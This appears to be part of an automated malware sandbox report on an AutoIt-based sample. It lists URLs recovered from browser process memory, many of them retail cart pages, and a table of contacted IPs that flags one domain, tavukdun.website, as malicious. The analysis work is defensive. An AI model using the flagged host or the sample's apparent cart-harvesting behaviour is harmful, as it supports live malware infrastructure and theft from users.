https://setup.office.com	chrome.exe, 00000017.00000003.169478799801.00000D7401908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479158150.00000D7401964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379122693.00000C6401168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172388612666.00000C640204C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.altardstate.com/cart/	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.adorama.com/als.mvc/cartview	chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)	chrome.exe, 0000002C.00000002.172372428401.00000C6400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369679433.00000C6400174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369117469.00000C64000EC000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.youtube.com/s/notifications/manifest/cr_install.htmlndler	chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.bestbuy.com/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.autoitscript.com/autoit3/J	JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044F8000.00000004.00000800.00020000.00000000.sdmp, Plates.pif, 0000000B.00000000.168214032566.0000000000BF9000.00000002.00000001.01000000.00000006.sdmp, SkySync.scr, 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmp, SkySync.scr, 00000015.00000000.168333353010.0000000000B59000.00000002.00000001.01000000.00000009.sdmp, SkySync.scr, 00000027.00000000.171156435267.0000000000B59000.00000002.00000001.01000000.00000009.sdmp	false	unknown
https://crbug.com/593024	chrome.exe, 00000017.00000003.169454409276.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273477177.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000017.00000003.169458748571.00000D7400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456103057.00000D7401658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456234176.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456463692.00000D7401684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455938436.00000D740162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278073543.00000C640050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275694599.00000C64016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276487178.00000C64016F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275917029.00000C64016CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276131140.00000C6400540000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com/search?q=autoit	chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.ae.com/us/en/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.ecosia.org/newtab/	chrome.exe, 0000002C.00000002.172374970740.00000C6400AC0000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://cart.ebay.com/	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 0000002C.00000002.172376425526.00000C6400CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172375679759.00000C6400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.gamestop.com/cart/	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://unitedstates4.ss.wd.microsoft.usdge	msedge.exe, 0000001B.00000002.169648180033.0000017282BDB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642819944.0000017282BD9000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642901211.0000017282BDA000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.boostmobile.com/cart.html	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://packetstormsecurity.com/	chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.samsclub.com/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/4722	msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172806654832.00007B1C00618000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com	chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://m.google.com/devicemanagement/data/api	chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/1452	msedge.exe, 0000001B.00000002.169653524603.000053D000460000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.overstock.com/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.bloomingdales.com/my-bag	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://gemini.google.com/app?q=	chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377043074.00000C6400D9C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://secure.newegg.com/shop/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://secure.eicar.org/eicar.com.txt	chrome.exe, 0000002C.00000002.172370661494.00000C6400340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://gemini.google.com/app?q=searchTerms	chrome.exe, 0000002C.00000002.172377043074.00000C6400D9C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	chrome.exe, 0000002C.00000002.172377931287.00000C6400EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172388612666.00000C640204C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.autoitscript.com/site/autoit/downloads/09P4	chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.jcrew.com/checkout/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://uk.search.yahoo.com/search	chrome.exe, 0000002C.00000002.172379307959.00000C64011A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172490986682.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172480287392.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172502216900.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172809076418.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172484310746.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172479678787.00007B1C00880000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://setup.office.com/signin-oidc	chrome.exe, 0000002C.00000002.172380514944.00000C64012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe	chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://googleads.g.doubleclick.net/	chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000017.00000003.169459350575.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169454409276.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275208595.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172274655981.00000C640154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273477177.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278206490.00000C6401640000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/42266842	chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.eicar.org:443	chrome.exe, 0000002C.00000002.172372314713.00000C6400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279996265.00000C6400720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272029471.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280226855.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277467418.00000C6400724000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://lens.google.com/gen204	chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	chrome.exe, 00000017.00000003.169456848549.00000D7400594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169460030676.00000D7400594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458457831.00000D7400594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169457901127.00000D7400590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371718507.00000C640058C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172373177537.00000C640088C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172375679759.00000C6400BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377931287.00000C6400EB8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com:443	chrome.exe, 0000002C.00000002.172372314713.00000C6400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279996265.00000C6400720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272029471.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280226855.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277467418.00000C6400724000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com/search?q=at	chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371045661.00000C64003BC000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=	chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/42263580	chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://apis.google.com	chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://drive.google.com/drive/installwebapp?usp=chrome_defaultt	chrome.exe, 0000002C.00000002.172377361676.00000C6400E04000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000017.00000003.169458748571.00000D7400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456103057.00000D7401658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456234176.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456463692.00000D7401684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455938436.00000D740162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278073543.00000C640050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275694599.00000C64016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276487178.00000C64016F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275917029.00000C64016CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276131140.00000C6400540000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.talbots.com/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://unitedstates2.ss.wd.microsoft.us	msedge.exe, 0000001B.00000002.169648453170.00000172890CE000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172788664313.00000123A90FB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172786391666.00000123A65D6000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://unitedstates1.ss.wd.microsoft.us	msedge.exe, 0000001B.00000002.169647724538.0000017282B8C000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000002.169648180033.0000017282BDB000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642819944.0000017282BD9000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001B.00000003.169642901211.0000017282BDA000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172788664313.00000123A90FB000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot	chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169451513999.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.google.com/update2/response	chrome.exe, 0000002C.00000002.172384926281.00000C64018FC000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292	chrome.exe, 0000002C.00000002.172379307959.00000C64011A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.bhphotovideo.com/find/cart.jsp	chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe	chrome.exe, 0000002C.00000002.172385547749.00000C6401978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.vitalsource.com/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://issuetracker.google.com/292285899	chrome.exe, 00000017.00000003.169452284058.00000D7401094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379060964.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273182443.00000C640114C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.carid.com/cart.php	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.c	chrome.exe, 0000002C.00000002.172373477637.00000C64008EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172369441720.00000C6400130000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.pokemoncenter.com/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://lens.google.com/v3/upload	chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://secure.eicar.org:443	chrome.exe, 0000002C.00000002.172372314713.00000C6400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279996265.00000C6400720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272029471.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280226855.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277467418.00000C6400724000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.comAccess-Control-Allow-Credentials:	chrome.exe, 0000002C.00000002.172371045661.00000C64003C5000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://recoveringlib.blogspot.com/	chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://anglebug.com/42265720	chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeP	chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370776333.00000C6400376000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://anglebug.com/42264571	chrome.exe, 0000002C.00000002.172378882804.00000C6401048000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://lens.google.com/upload	chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.homedepot.com/mycart/home	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://docs.google.com/document/?usp=installed_webapp	chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381124600.00000C64013C0000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://beastacademy.com/checkout/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1cc	chrome.exe, 00000017.00000003.169483014536.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372999161.00000C6400854000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211	chrome.exe, 00000017.00000003.169479433883.00000D740124C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479337904.00000D740196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383543045.00000C6401640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380455425.00000C64012D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374714954.00000C6400A98000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.belk.com/shopping-bag/	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.youtube.com/:	chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://mail.google.com/mail/	chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.199.48.23	hbx.media.net	United States	20940	AKAMAI-ASN1EU	false
20.189.173.1	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.19.131.76	cm.mgid.com	United States	13335	CLOUDFLARENETUS	false
142.251.40.132	www.google.com	United States	15169	GOOGLEUS	false
68.67.179.155	ib.anycast.adnxs.com	United States	29990	ASN-APPNEXUS	false
108.139.47.92	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
68.67.179.153	m.anycast.adnxs.com	United States	29990	ASN-APPNEXUS	false
195.244.31.11	visitor-usa02.omnitagjs.com	France	63140	IGUANA-WORLDWIDEUS	false
35.213.89.133	trace.popin.cc	United States	19527	GOOGLE-2US	false
188.245.203.37	tavukdun.website	Iran (ISLAMIC Republic Of)	16322	PARSONLINETehran-IRANIR	true
151.101.1.44	dualstack.tls13.taboola.map.fastly.net	United States	54113	FASTLYUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.65.164	unknown	United States	15169	GOOGLEUS	false
68.67.161.208	unknown	United States	29990	ASN-APPNEXUS	false
107.23.5.106	ds-pr-bh.ybp.gysm.yahoodns.net	United States	14618	AMAZON-AESUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
64.202.112.31	nydc1.outbrain.org	United States	22075	AS-OUTBRAINUS	false
35.208.249.213	trace.mediago.io	United States	19527	GOOGLE-2US	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
